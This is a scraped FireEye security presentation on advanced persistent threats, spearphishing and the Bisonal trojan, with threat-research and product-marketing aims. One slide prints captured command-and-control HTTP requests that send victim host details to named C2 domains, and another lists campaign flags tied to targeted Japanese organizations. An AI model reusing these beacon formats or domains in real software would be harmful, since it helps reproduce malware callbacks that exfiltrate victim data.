![Page 1: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/1.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1
Stopping Next-Gen Threats
Dan Walters – Sr. Systems Engineer Mgr.
![Page 2: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/2.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 2
![Page 3: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/3.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 3
"We're moving towards a world where every attack is effectively zero-day… having a signatured piece of malware, that shouldn't be the foundation on which any security model works." - Chris Young, GVP Cisco Security
Tech Week Europe, September 28th 2012
![Page 4: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/4.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 4
High Profile APT Attacks Are Increasingly Common
![Page 5: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/5.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 5
The Attack Lifecycle – Multiple Stages
Exploitation of system1
3 Callbacks and control established
2 Malware binary download
CompromisedWeb server, or
Web 2.0 site
1Callback Server
IPS
32DMZ
File Share 2
File Share 1
![Page 6: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/6.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 6
Crimeware == for the $
![Page 7: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/7.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 7
Advanced Persistent Threat == Human
![Page 8: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/8.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 8
This is Alex == FireEye Research
![Page 9: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/9.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 9
The Usual Suspects
![Page 10: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/10.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 10
Organized…Persistent…
![Page 11: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/11.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 11
Reconnaissance made easy…
![Page 12: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/12.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 12
The Exploit
![Page 13: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/13.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 13
LaserMotive
![Page 14: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/14.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 14
CEOs are targeted
![Page 15: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/15.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 15
Could you stop this?
![Page 16: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/16.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 16
The Callback
![Page 17: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/17.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 17
Hidden in plain view…
![Page 18: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/18.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 18
Blog Post?
![Page 19: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/19.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 19
RSS Feed?
![Page 20: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/20.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 20
We’re Only Human
![Page 21: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/21.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 21
HR make for easy targets
![Page 22: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/22.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 22
Just doing my job…
![Page 23: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/23.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 23
NATO is a frequent spearphish target
![Page 24: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/24.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 24
Global Unrest
![Page 25: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/25.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 25
Who’s Oil is it?
![Page 26: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/26.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 26
The curious case of Trojan.Bisonal
• Targets 100% Japanese organizations
• Delivered via weaponized doc/xls files
• Embeds the target name into the command and control traffic
![Page 27: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/27.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 27
Custom “Flag” and c2 domain
GET /j/news.asp?id=* HTTP/1.1
User-Agent: flag:khi host:Business IP:10.0.0.43 OS:XPSP3 vm: proxy: �� ��Host: online.cleansite.us Cache-Control: no-cache
GET /a.asp?id=* HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: khi.acmetoy.com Connection: Keep-Alive
![Page 28: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/28.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 28
Other “Flag”s seen
• flag:410maff <-- ministry of agriculture, forestry, and fisheries• flag:1223• Flag:712mhi <-- mitsubishi heavy industries• Flag:727x• Flag:8080• Flag:84d• flag:boat• Flag:d2• Flag:dick• flag:jsexe• flag:jyt• Flag:m615• flag:toray• Flag:MARK 1• flag:nec01 <-- nec corporation• Flag:qqq• flag:nids <-- national institute for defense studies (nids.go.jp)• flag:nsc516 <-- nippon steel corp• flag:ihi <-- ihi corp
![Page 29: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/29.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 29
China is not the only threat
![Page 30: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/30.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 30
Multi-Protocol, Real-Time VX Engine
PHASE 1Multi-Protocol Object Capture
PHASE 2Virtual Execution Environments
PHASE 1: WEB MPS• Aggressive Capture• Web Object Filter
DYNAMIC, REAL-TIME ANALYSIS
• Exploit detection
• Malware binary analysis
• Cross-matrix of OS/apps
• Originating URL
• Subsequent URLs
• OS modification report
• C&C protocol descriptors
Map to TargetOS and
Applications
PHASE 1: E-MAIL MPS• Email Attachments• URL Analysis
![Page 31: Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr](https://reader038.vdocuments.mx/reader038/viewer/2022102814/55182f1655034691678b4e06/html5/thumbnails/31.jpg)
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 31
Thank You!
FireEye - Modern Malware Protection System